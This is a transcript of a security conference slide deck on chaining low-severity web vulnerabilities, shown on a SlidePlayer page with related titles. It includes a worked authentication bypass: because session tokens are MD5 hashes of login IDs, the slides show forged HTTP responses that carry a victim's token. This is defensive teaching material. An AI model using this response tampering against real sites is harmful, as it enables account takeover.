Vulnerability Chaining Every Low Issue Has its big impact

Slides:



Advertisements
Similar presentations
Webgoat.
Advertisements

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
OWASP Web Vulnerabilities and Auditing
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
SEC835 OWASP Top Ten Project.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
The 10 Most Critical Web Application Security Vulnerabilities
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Workshop 3 Web Application Security Li Weichao March
Web Security Overview Lohika ASC team 2009
OWASP Zed Attack Proxy Project Lead
HTTP and Server Security James Walden Northern Kentucky University.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
The OWASP Way Understanding the OWASP Vision and the Top Ten.
Security testing of study information system Security team: Matis Alliksoo Alo Konno Urmo Lihten Taavi Podzuks Sander Saarm.
Ryan Dewhurst - 20th March 2012 Web Application (PHP) Security.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Browser Web Server Users DB 2a. Redirect to login page plugin 1. access a protected page Login Web Server (https) aislogin.cern.ch edh.cern.ch 3a. Set.
Oracle Application Express Security. © 2009 Oracle Corporation Authentication Out-of-the-Box Pre-Configured Schemes LDAP Directory credentials Oracle.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
OWASP Top Ten #1 Unvalidated Input. Agenda What is the OWASP Top 10? Where can I find it? What is Unvalidated Input? What environments are effected? How.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.
nd Joint Workshop between Security Research Labs in JAPAN and KOREA Marking Scheme for Semantic- aware Web Application Security HPC.
Web Applications Testing By Jamie Rougvie Supported by.
OWASP OWASP top 10 - Agenda  Background  Risk based  Top 10 items 1 – 6  Live demo  Top 10 items 7 – 10  OWASP resources.
Securing Java Applications
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
CS526Topic 12: Web Security (2)1 Information Security CS 526 Topic 9 Web Security Part 2.
Mr. Justin “JET” Turner CSCI 3000 – Fall 2015 CRN Section A – TR 9:30-10:45 CRN – Section B – TR 5:30-6:45.
Web2.0 Secure Development Practice Bruce Xia
Mr. Justin “JET” Turner CSCI 3000 – Fall 2015 CRN Section A – TR 9:30-10:45 CRN – Section B – TR 5:30-6:45.
Copyright © The OWASP Foundation This work is available under the Creative Commons SA 2.5 license The OWASP Foundation OWASP Denver February 2012.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Ken De Souza KWSQA, April 2016 V. 1.0
ASP.NET 2.0 Security Alex Mackman CM Group Ltd
The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.
Do not try any of the techniques discussed in this presentation on a system you do not own. It is illegal and you will get caught.
Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.
SECURE DEVELOPMENT. SEI CERT TOP 10 SECURE CODING PRACTICES Validate input Use strict compiler settings and resolve warnings Architect and design for.
UKUUG Linux 2008 Introduction to Web Application Security Flaws Jake Edge LWN.net URL for slides:
MIS Week 10 Site:
COMP9321 Web Application Engineering Semester 2, 2017
Building Secure ColdFusion Applications
Web Application Vulnerabilities
An Introduction to Web Application Security
Security Autodesk DevDays rEvolution
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Securing Your Web Application in Azure with a WAF
TOPIC: Web Security (Part-4)
API Security Auditing Be Aware,Be Safe
Penetration Testing following OWASP
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Cross-Site Forgery
Marking Scheme for Semantic-aware Web Application Security
Intro to Ethical Hacking
1. ASSOCILATE DEGREE PROGRAM Application Attacks SUBMITTED TO: Fatima Ashiq SUBMITTED By: University Of Central Punjab Farooq Sardar (V1F16ASOC0012) Adnan.
Bill Riggins III OWASP Orlando Co-Chapter Lead
Defense in Depth Web Server Custom HTTP Handler Input Validation
Riding Someone Else’s Wave with CSRF
WWW安全 國立暨南國際大學 資訊管理學系 陳彥錚.
Web Server Design Week 5 Old Dominion University
Active Man in the Middle Attacks
Exploring DOM-Based Cross Site Attacks
Presentation transcript:

Vulnerability Chaining Every Low Issue Has its big impact Chandrakant Nial Security Analyst

BIO Chandrakant Nial is a security analyst and a practicing developer and a security bug hunter in Bhubaneswar. His career span over 3 years including TCS and as an independent bounty hunter. His education includes Bachelor in Computer Sc. from BPUT, Orissa.

Agenda OWASP TOP 10 2013 Some low issue that we come across Typical mistake by developers Chaining Process Analyzing the response and understanding behavior of application Using multiple vulnerability Knowledge on various technology Impacts Defacing website Account take over Delete codebase, DataBases, etc… Best practices/References Conclusion

Top 10 List A1-Injection A2-Broken Authentication and Session Management A3-Cross-Site Scripting (XSS) A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards

Low Issues Unwanted Methods (PUT,DELETE,HEAD) Cookie Low flag Encryption (URL,Base64) Directory traversal Banner grabbing Url Redirection Information Disclose ,Mixed Content

Typical Mistakes Ignorance Unaware Of security things They don’t care security but functionality is all they want

Chaining Process Low bug

Chaining Process Chained BUG Versoix, Switzerland

Chaining Process Example – 1 https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model

Chaining Process Examples https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model

Chaining Process Examples https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model

Chaining Process Examples https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model

Chaining Process Examples

Chaining Process Examples

Chaining Process Examples https://hackerone.com/reports/42961

Chaining Process Examples https://hackerone.com/reports/42961

Chaining Process By passing authentication Consider two user Attackers Login ID: attackerloginid md5 hash value:  636559678682db9e21c958a4df44eea4 Victims Login ID: victimloginid md5 hash value: e9fc2abd9060fde1a67e3367b7d64bd0 http://www.websecresearch.com/2014/05/a-way-to-bypass-authentication.html

Authentication Bypass Original Server Response Using Attackers Account with Wrong Password HTTP/1.1 200 OK Date: Wed, 7 May 2014 21:17:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 {"failed":false}

Authentication Bypass… Original Response Using Attackers Account with Right Password: HTTP/1.1 302 Found Date: Wed,  7 May 2014 21:17:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 {"success":true}

Authentication Bypass… Modified Response in which the attacker modified the Response Code, Set-Cookies & there Values, Status Code Values and Sent it as a Request: HTTP/1.1 302 Found Date: Wed, 7 May 2014 21:17:27 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/ Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 {"success":true}

Moral How to Start Chaining? Find Vulnerability Analyze bugs Research on customer’s business

Moral How to Start Chaining? Find Vulnerability Analyze bugs Research on customer’s business

Demo DEMO

Moral Questions Please Vulnerable code + weak Configuration = Dangerous Exploitation Every Vulnerability need to patch irrespective of severity Questions Please

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.